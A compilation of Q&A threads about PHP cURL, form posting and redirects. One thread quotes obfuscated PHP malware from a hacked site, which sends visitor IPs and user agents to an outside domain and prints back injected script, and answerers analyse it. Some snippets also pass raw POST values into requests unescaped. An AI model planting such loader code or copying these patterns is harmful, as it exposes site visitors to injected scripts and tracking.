I've read a lot of cURL questions on here and none of them seem to have had the same problem I am having.
I have a form set up to submit the following:
if(isset($_POST['submitted_form']) && $_POST['submitted_form'] == "yes"){
$ch = curl_init("https://www.pipelinedeals.com/web_lead");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_REFERER, "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."");
curl_setopt($ch, CURLOPT_POSTFIELDS, "developer_mode=".$_POST['developer_mode']."&thank_you_page=".$_POST['thank_you_page']."&w2lid=".$_POST['w2lid']."&assign_to_id=".$_POST['assign_to_id']."&lead[lead_source]=".$_POST['lead[lead_source]']."&lead[full_name]=".$_POST['lead[full_name]']."&lead[phone]=".$_POST['lead[phone]']."&lead[email]=".$_POST['lead[email]']."");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
}
Before anyone asks why I am using such a convoluted method to post the data, rather than just submitting the form, it is because I want to use the data for some other purposes before passing it on to PipelineDeals.
It's so close to working properly I can taste it. My problem is that when I run the code on say "http://exampledomain.com" it goes ahead and posts the data perfectly. The problem is it isn't performing the redirect properly.
What happens is the data posts. "http://exampledomain.com" is left in the address bar, the content of "https://www.pipelinedeals.com/web_lead" loads on the page (and loads in a way that demonstrates it received the posts), then the content of "http://exampledomain.com" loads under it. It's like cURL is pulling in the content of the other page, rather than redirecting the user to it.
Any suggestions?
It's like cURL is pulling in the content of the other page, rather
than redirecting the user to it.
cURL won't actually redirect the user to the page in question. The client's browser is completely oblivious to what cURL is doing. As far as the browser is concerned, it is simply receiving this data back from your server (which is executing the POST request).
To solve this, you might want to setup a hidden form and then submit that form via JavaScript. Small example:
<form id="pipeline" action="https://www.pipelinedeals.com/web_lead" method="post">
<input type="hidden" name="w2lid" value="<?php echo $_POST['w2lid']; ?>">
<!-- the rest of your POST vars -->
</form>
And the JS:
document.getElementById('pipeline').submit();
Because that is exactly what curl does. It grabs the output of your request, and then you can do some fancy things with it if you like, and then you use that information to render your own page for example.
Are you not looking for: header("Location: http://www.example.com/"); /* Redirect browser */
http://php.net/manual/en/function.header.php
(possibly together with the CURL of course)
Related
Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.
<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>
Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:
$_SERVER['HTTP_USER_AGENT']
It is then combined into a url similar to the one below, but with the user information from above added to the url
http://html-href.com/href/?ip=::1&referer=localhost&ua=
I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?
The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.
It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.
EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.
$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox(Gecko) or IE(MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.
So I have a contact form on one website, but I want to use the mailing function on another.
I can make forms and get the text and send them in the PHP mail function just fine, I'm just not sure how to do this for another website without opening another tab.
Also, I'm not even sure what to call this.
For example:
I have text fields and a submit button on one website, and I want to send that data to another URL like so:
http://myurl.com?act=phptools&email=example#test.com&subject=Hello&message=How are you?
How would I do this without opening another tab in the browser?
Just set the action attribute of your form to the URL of the processing script on the other domain.
But make sure this is secure, I mean, if you control the second domain, then its okay. Else, you may have to be concerned about sharing data with another domain. But then, I don't know what your requirement is :)
Set the action attribute of the form to the other website url. The user on submit will be taken there, and on success/failure you can redirect the user to the old website url or wherever you want.
Even better use XHR/Ajax, so that the request is made behind the scenes and all you need to do is show the error msg/success msg based on the json response you sent from the other website url. However with this method there are limitations as browsers do not allow cross origin requests. So check if you can enable CORs!
Another thing you can do is send request to current website url only and that would interact with the other website url server-size, hope it makes sense.
As far as i understand your question You can use CURL php functions for this
<?php
$urltopost = "http://somewebsite.com/script.php";
$datatopost = array (
"firstname" => "ex_name",
"lastname" => "ex_lastname",
"email" => "my#email.com",
);`enter code here`
<span id="more-40"></span>`enter code here
$ch = curl_init ($urltopost);
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $datatopost);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
$returndata = curl_exec ($ch);
?>
I'm writing a PHP script that searches and reads html content using cURL.
I want to determine from the content and/or response header whether the target page requires login to access.
I understand that normally, upon anonymously requesting the page, the server would redirect to a login page if required. Correct me if I'm wrong.
I have read around and got a few ideas:
search for refresh meta tag or when the http return code is 302, then check if it refers to a URI with &action=login (or similar)
search for login form in the body of the effective page. (I recognize that there could be content AND login form on the same page)
Are these methods valid and how accurate are these methods? What other techniques/signs can I use to identify/suggest login page? Or is this an impossible task to carry out aiming at 60-70% accuracy?
Note: I'm not trying to scrape, just finding out whether it's a login-required page.
The following is the relevant options, just for reference.
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
Thank you in advance
Look for a form on the redirect target page with a <input type='password'
This code in PHP sends a HTTP POST to a Django app using CURL lib.
I need that this code sends POST but redirect to the page in the same submit. Like a simple form does.
The PHP Code:
$c = curl_init();
curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($c, CURLOPT_URL, "http://www.xxx.com");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, 'Var='.$var);
curl_exec($c);
curl_close ($c);
In this case, the PHP is sending the HTTP POST, but is not redirecting to the page. He is printing the result. My URL still .php and not a django/url/
I need be redirected to the django URL with the Post like a simple form in HTML does.
Any Idea?
Thanks.
Your code does a server-side POST request to the page. You can't "redirect" the user to the same "instance" of the page.
If you need to do it in one step, print out a form with method="POST" and hidden fields and then add JavaScript which automatically submits it.
Hey here is my problem : i made a flash and i can`t change it no mather what. That flash had a form that was sending data to my subdomain.. i had to remove the subdomain and i got a new website, the problem is this : how do i redirect the form data from the old site to the new one?
In the flash i had the form send the data to : subdomain.site.ro/subscribe.php i still have that file there and i could write a script in it but the field names are something like : field[name] and i can't process them so i must send them to the original script witch is now on another site : othersite.ro/subscribe.php.
So basicaly i must write a script that passes the post/get variables to the new script (on the new website) or to write a .htaccess file that will redirect the post/get variables to the new website
Can someone help me? i`ve been searching for a long time and i could not find anything helpfull
I would be gratefull if you would at least try to help.
Thanks,
Dan
Ok Now i can proccess the variables with the script below(with a html form). But the flash is not sending any variables to the script. i tried a lot of things and i am still trying.. any ideeas ? if yes please let me know.
Thanks,
Dan
<?php
if(isset($_POST['key']['yourmom']))
echo 'Your mom is '.$_POST['key']['yourmom'].' and your face '.$_POST['key']['yourface'];
?>
<form method="post">
<input type="hidden" name="key[yourmom]" value="lol">
<input type="hidden" name="key[yourface]" value="failed">
<input type="submit">
</form>
<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://othersite.ro/subscribe.php");
header("Connection: close");
exit;
?>
If that doesn't accomplish what you need, then you might try resorting to acting as somewhat of a proxy via curl:
<?php
$ch = curl_init('http://othersite.ro/subscribe.php');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "key1=val1&key2=val2&key3=val3");
curl_exec ($ch);
curl_close ($ch);
?>
yup "Dav" answered that correctly.
also, if you get an error saying headers have already been sent just put "ob_start();" right under the opening "<?php" - that is, if you plan on putting this knee deep in another php script.
you need to loop over the $_POST and $_GET variables (arrays) to get all the variables:
<?php
header("HTTP/1.1 301 Moved Permanently");
$poststring="";
foreach ($_POST as $variable=>$value)
{
$poststring.=$variable."=".$value."&";
}
header("Location: http://othersite.ro/subscribe.php?".$poststring);
header("Connection: close");
exit;
?>
same goes for GET variables (just use $_GET in the same manner)
<?php
if(isset($_POST['key']['yourmom'])) echo 'Your mom is '.$_POST['key']['yourmom'].' and your face '.$_POST['key']['yourface'];
?>
<form method="post">
<input type="hidden" name="key[yourmom]" value="lol">
<input type="hidden" name="key[yourface]" value="failed">
<input type="submit">
</form>
copy the code above and run it.. instead of $_POST['value'] it's just $_POST['key']['value']
so like <input name='something' = $_POST['something']
is the same as <input name='key[bla]' = $_POST['key']['bla']
The correct way to do it would be to change the DNS record so your old subdomain points to your new one. Then everything just gets submitted to the new domain, although with the same path. But it doesn't sound like you can do that.
The alternative is to emulate the POST that the your flash app submitted using curl. Just grab the url query string (GETs) and submit the POST. It doesn't matter that your field names are $_POST['key']['value'].
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'othersite.ro/subscribe.php?'.$_SERVER['QUERY_STRING']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $_POST);
curl_setopt($ch, CURLOPT_USERAGENT, 'Redirect Fix');
$result = curl_exec($ch);
curl_close($ch);
You could even return the $result variable to your flash app. Then you just have a server in the middle routing data back and forth. You can drop the CURLOPT_USERAGENT line, you just use that if you want to specify a custom agent, normally this is the browser identifier string.